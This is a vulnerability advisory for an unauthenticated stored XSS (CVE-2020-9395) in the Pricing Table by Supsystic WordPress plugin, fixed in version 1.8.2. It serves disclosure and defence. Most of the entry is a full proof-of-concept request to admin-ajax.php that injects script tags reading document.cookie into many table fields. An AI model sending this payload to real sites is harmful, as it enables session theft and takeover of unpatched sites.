Pricing Table by Supsystic < 1.8.2 - Unauthenticated Stored XSS
Description
The importJSONTable AJAX endpoint performs no permission check, so unauthenticated users can inject malicious JavaScript that is stored by the plugin.
Proof of Concept
URL /wp-admin/admin-ajax.php?mod=tables&action=importJSONTable&data%5B0%5D%5Bid%5D=11&data%5B0%5D%5Bunique_id%5D=Pwn8M1EB&data%5B0%5D%5Blabel%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Boriginal_id%5D=11&data%5B0%5D%5Bparams%5D%5Bbg_color%5D%5Bval%5D=%23424242&data%5B0%5D%5Bparams%5D%5Btxt_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl%22+data-el%3D%22table_cell_txt%22+data-type%3D%22txt%22%3E%3Cp%3E%3Cspan+style%3D%22font-size%3A+12pt%3B%22+data-mce-style%3D%22font-size%3A+12pt%3B%22%3EYour+Text%3C%2Fspan%3E%3C%2Fp%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bimg_item_html%5D%5Bval%5D=%3Cdiv+class%3D%22ptsEl+ptsElImg+ptsElWithArea%22+data-el%3D%22table_cell_img%22+data-type%3D%22img%22%3E%0D%0A%09%3Cdiv+class%3D%22ptsElArea%22%3E%3Cimg+src%3D%22http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fexample.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bicon_item_html%5D%5Bval%5D=%3Cdiv+data-icon%3D%22fa-cog%22+data-color%3D%22rgb(0%2C+220%2C+223)%22+data-type%3D%22icon%22+data-el%3D%22table_cell_icon%22+class%3D%22ptsIcon+ptsEl+ptsElInput%22%3E%3Ci+class%3D%22fa+fa-2x+ptsInputShell+fa-cog%22+style%3D%22color%3A+rgb(0%2C+220%2C+223)%3B%22%3E%3C%2Fi%3E%3C%2Fdiv%3E&data%5B0%5D%5Bparams%5D%5Bnew_column_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bnew_cell_html%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Bcell_color_css%5D%5Bval%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bparams%5D%5Benb_desc_col%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bcol_width%5D%5Bval%5D=186&data%5B0%5D%5Bparams%5D%5Bcols_num%5D%5Bval%5D=4&data%5B0%5D%5Bparams%5D%5Brows_num%5D%5Bval%5D=5&data%5B0%5D%5Bparams%5D%5Bcalc_width%5D%5Bval%5D=table&data%5B0%5D%5Bparams%5D%5Btable_width%5D%5Bval%5D=100&data%5B0%5D%5Bparams%5D%5Btable_width_measure%5D%5Bval%5D=%25&data%5B0%5D%5Bparams%5D%5Benb_hover_animation%5D%5Bval%5D=1&data%5B0%5D%5Bparams%5D%5Bfont_family%5D%5Bval%5D=Raleway&data%5B0%5D%5Bparams%5D%5Btext_color%5D%5Bval%5D=%23000&data%5B0%5D%5Bparams%5D%5Btext_color_header%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Btext_color_desc%5D%5Bval%5D=%23808080&data%5B0%5D%5Bparams%5D%5Bresp_min_col_width%5D%5Bval%5D=150&data%5B0%5D%5Bparams%5D%5Bis_horisontal_row_type%5D%5Bval%5D=0&data%5B0%5D%5Bhtml%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bcss%5D=<script>alert(document.cookie)</script>&data%5B0%5D%5Bimg%5D=gradient-standard.jpg&data%5B0%5D%5Bsort_order%5D=0&data%5B0%5D%5Bis_base%5D=1&data%5B0%5D%5Bis_pro%5D=0&data%5B0%5D%5Bdate_created%5D=2020-01-16+00%3A40%3A10&data%5B0%5D%5Bimg_url%5D=http%3A%2F%2Fsupsystic-42d7.kxcdn.com%2F_assets%2Ftables%2Fimg%2Fprev%2Fgradient-standard.jpg&data%5B0%5D%5Bsession_id%5D=715993&data%5B0%5D%5Bview_id%5D=ptsBlock_715993&data%5B0%5D%5Bcat_code%5D=price_table&update_with_same_id=1&pl=pts&reqType=ajax

Affects Plugin

Fixed in version 1.8.2

References

CVE 2020-9395
URL https://www.wordfence.com/blog/2020/02/multiple-vulnerabilities-patched-in-pricing-table-by-supsystic-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 1672
Verified No
WPVDB ID 10091

Timeline

Publicly Published 2020-02-25
Added 2020-02-25
Last Updated 2020-02-26
